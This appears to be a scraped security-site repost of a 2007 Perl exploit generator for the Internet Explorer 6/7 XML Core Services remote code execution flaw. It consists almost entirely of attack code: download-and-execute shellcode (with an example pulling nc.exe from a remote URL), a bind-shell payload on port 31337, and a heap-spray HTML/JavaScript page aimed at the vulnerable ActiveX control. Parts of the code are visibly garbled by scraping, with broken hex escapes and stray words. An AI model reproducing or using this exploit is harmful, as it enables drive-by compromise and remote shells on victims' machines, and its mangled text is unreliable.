MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it-vulnerability warning-the black bar safety net

2007-03-15T00:00:00
ID MYHACK58:62200714555
Type myhack58
Reporter 佚名
Modified 2007-03-15T00:00:00

Description

! perl/bin

Gr33tZ => O. G. | chaos | sakkure | nukedx | xoron | Stansar ^^

(c)cnhacker.com

MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it

usage : perl wow.pl <shell> <outputting_file>

FR0M => www.cnhacker.com

cnhacker attack group

n0t => binding port 3 1 3 3 7 : )

SHELL => BÝND SHELL => -b

SHELL => DOWN & EXEC => -d

use I:Handle; if (@ARGV < 2) { print' Gr33tZ = O. G. | chaos | sakkure | nukedx | xoron | Stansar ^^ MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it

' and print "usage : perl $0 <sh3ll> <outputting_html> <url or null>\n"; print' -d => Download And Exec. Shell -b => Win32 Bind Shell (port => 3 1 3 3 7) if You Select-d You Must Enter File_url or You Select-b Null ^^ '; print "Example : perl $0-b laz.html \n"; print "Example : perl $0-d laz.html http://blah.com/nc.exe \n" and exit; } $html = $ARGV[1]; my $shcode = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x 76\x20\x03". "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74". "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E". "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03". "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C". "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40". "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C". "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC". "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F". "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB". "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83". "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF". "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF". "$ARGV[2]";

[win32_bind sh3llc0d3] LPORT=3 1 3 3 7 thx => www.metasploit.com

my $shall = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61". "\x19\x4c\x17\x83\xeb\xfc\xe2\xf4\x9d\x73\xa7\x5a\x89\xe0\xb3\xe8". "\x9e\x79\xc7\x7b\x45\x3d\xc7\x52\x5d\x92\x30\x12\x19\x18\xa3\x9c". "\x2e\x01\xc7\x48\x41\x18\xa7\x5e\xea\x2d\xc7\x16\x8f\x28\x8c\x8e". "\xcd\x9d\x8c\x63\x66\xd8\x86\x1a\x60\xdb\xa7\the XE3\x5a\x4d\x68\x3f". "\x14\xfc\xc7\x48\x45\x18\xa7\x71\xea\x15\x07\x9c\x3e\x05\x4d\xfc". "\x62\x35\xc7\x9e\x0d\x3d\x50\x 76\xa2\x28\x97\x73\xea\x5a\x7c\x9c". "\x21\x15\xc7\x67\x7d\xb4\xc7\x57\69\x47\x24\x99\x2f\x17\xa0\x47". "\x9e\xcf\x2a\x44\x07\x71\x7f\x25\x09\x6e\x3f\x25\x3e\x4d\xb3\xc7". "\x09\xd2\xa1\xeb\x5a\x49\xb3\xc1\x3e\x90\xa9\x71\xe0\xf4\x44\x15". "\x34\x73\x4e\xe8\xb1\x71\x95\x1e\x94\xb4\x1b\xe8\xb7\x4a\x1f\x44". "\x32\x4a\x0f\x44\x22\x4a\xb3\xc7\x07\x71\x36\x7e\x07\x4a\xc5\xf6". "\xf4\x71\xe8\x0d\x11\xde\x1b\xe8\xb7\x73\x5c\x46\x34\xe6\x9c\x7f". "\xc5\xb4\x62\xfe\x36\xe6\x9a\x44\x34\xe6\x9c\x7f\x84\x50\xca\x5e". "\x36\xe6\x9a\x47\x35\x4d\x19\xe8\xb1\x8a\x24\xf0\x18\xdf\x35\x40". "\x9e\xcf\x19\xe8\xb1\x7f\x26\x73\x07\x71\x2f\x7a\xe8\xfc\x26\x47". "\x38\x30\x80\x9e\x86\x73\x08\x9e\x83\x28\x8c\xe4\xcb\xe7\x0e\x3a". "\x9f\x5b\x60\x84\xec\x63\x74\xbc\xca\xb2\x24\x65\x9f\xaa\x5a\xe8". "\x14\x5d\xb3\xc1\x3a\x4e\x1e\x46\x30\x48\x26\x16\x30\x48\x19\x46". "\x9e\xc9\x24\xba\xb8\x1c\x82\x44\x9e\xcf\x26\xe8\x9e\x2e\xb3\xc7". "\xea\x4e\xb0\x94\xa5\x7d\xb3\xc1\x33\xe6\x9c\x7f\x91\x93\x48\x48". "\x32\xe6\x9a\xe8\xb1\x19\x4c\x17"; if ($ARGV[0] eq '-d') { $sh = $shcode; if ($ARGV[2] =~ /http/) {goto tamam;} if ($ARGV[2] =~ /ftp/) {goto tamam;} else { print' [-] You Must Start http:// or ftp:// ' and exit; } } if ($ARGV[0] eq '-b') { $sh = $shall; if (!$ ARGV[2] =~ /w/) {goto tamam;} else { goto tamam; } } tamam: for(;;) { my $kod = <<KOD <html xmlns="http://www.w3.org/1999/xhtml"> <body> <object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" > </object> <script> var obj = null; function the Trojan() { obj = document. getElementById('target'). object;

try { obj. open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {};

KOD ; $tamkod = dongu($sh);

__citati0n t0 YAG KOHHA's WebViewFolderIcon Expl0itZ___

sub dongu { my $data = shift; my $mode = shift() || 'LE'; my $code = ";

my $idx = 0;

if (length($data) % 2 != 0) { $data .= substr($data, -1, 1); }

while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); if ($mode eq 'LE') { $code .= sprintf('%%u%. 2x%. 2x', $c2, $c1); } else { $code .= sprintf('%%u%. 2x%. 2x', $c1, $c2); } $idx += 2; }

return $code; }

_____________

my $sh3ll = <<SHELL sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + "%u9090%u9090$tamkod"); SHELL ; my $tam = <<TAM sz = sh. length * 2; npsz = 0x400000-(sz+0x38); nps = unescape ("%u0D0D%u0D0D"); while (nps. length*2<npsz) nps+=nps; ihbc = (0x12000000-0x400000)/0x400000; mm = new Array(); for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj. open(new Object(),new Object(),new Object(),new Object(), new Object());

obj. setRequestHeader(new Object(),'......'); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); } </script> <body >

</body></html> TAM ; open X, ">$html" or die "[-] $html the File Create Failed \n" and exit; print X $kod; print X $sh3ll; print X $tam; X->close; sleep(1); if (-e $html) { print "[+] $html File Is Created ^^\n"; } exit(1); }